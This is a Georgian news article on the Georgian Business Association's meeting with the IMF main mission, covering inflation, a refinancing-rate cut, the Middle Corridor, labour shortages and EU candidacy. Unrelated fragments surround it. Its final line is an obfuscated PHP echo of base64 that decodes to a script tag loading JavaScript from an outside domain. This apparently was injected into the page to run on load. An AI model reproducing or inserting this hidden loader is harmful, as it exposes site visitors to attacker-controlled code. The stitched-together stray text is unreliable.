celsiusi
ავერსი შნაიდერი

საქართველოს ბიზნეს ასოციაციაში საერთაშორისო სავალუტო ფონდის (IMF) მთავარ მისიასთან შეხვედრა გაიმართა, სადაც ქვეყნის მაკროეკონომიკური პარამეტრები და მონეტარული პოლიტიკა განიხილეს.

შეხვედრის ფარგლებში, საუბარი შეეხო ქვეყანაში არსებული ინფლაციის დონეს და მის გავლენას სამომხმარებლო ფასებზე, ასევე ეროვნული ბანკის მიერ დადგენილ რეფინანსირების განაკვეთს, რომლის ნიშნულიც 0.75%-ით შემცირდა. განხილული იყო ექსპორტ-იმპორტისა და ტრანსპორტისა და ლოგისტიკის საკითხები. განსაკუთრებული ყურადღება გამახვილდა შუა დერეფნის როლზე და ფუნქციაზე, რომელიც თავის მხრივ, ახალ საინვესტიციო პოტენციალს ქმნის.

BAG ინდექსის მიმოხილვის მიხედვით ბიზნესისთვის მთავარ გამოწვევად კვლავ კვალიფიციური კადრებისა და ადამიანური რესურსის დეფიციტი სახელდება, შესაბამისად ყურადღება დაეთმო პროფესიულ განათლების როლს და ამ მიმართულებით კომპანიების საქმიანობასა და ჩართულობას.

შეხვედრის ფარგლებში, განხილული იყო ის შესაძლებლობების ფანჯარა, რომელსაც საქართველოს ევროკავშირის კანდიდატი ქვეყნის სტატუსი ანიჭებს და ევროპული ბაზრის პერსპექტივები და ეკონომიკური ურთიერთობები, რომელიც მეტ მდგრადობასა და განვითარების შესაძლებლობას მოუტანს ქვეყანას.

„ჩვენს უცხოელ პარტნიორებთან საქმიანი დიალოგი მნიშვნელოვანია გამოცდილებისა და ეკონომიკაში არსებული მონაცემების გაზიარების თვალსაზრისით, რასაც პროცესში მეტი სიცხადე შემოაქვს. საერთაშორისო სავალუტო ფონდის მთავარ მისიასთან განვიხილეთ ის ეკონომიკური პარამეტრები და მოვლენები, რომელიც გავლენას ახდენს როგორც ბიზნეს სექტორსა და მომხმარებელზე, ასევე ქვეყნის ეკონომიკურ განვითარებაზე“ განაცხადა საქართველოს ბიზნეს ასოციაციის აღმასრულებელი დირექტორის პირველმა მოადგილემ აკაკი საღირაშვილმა.

227
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");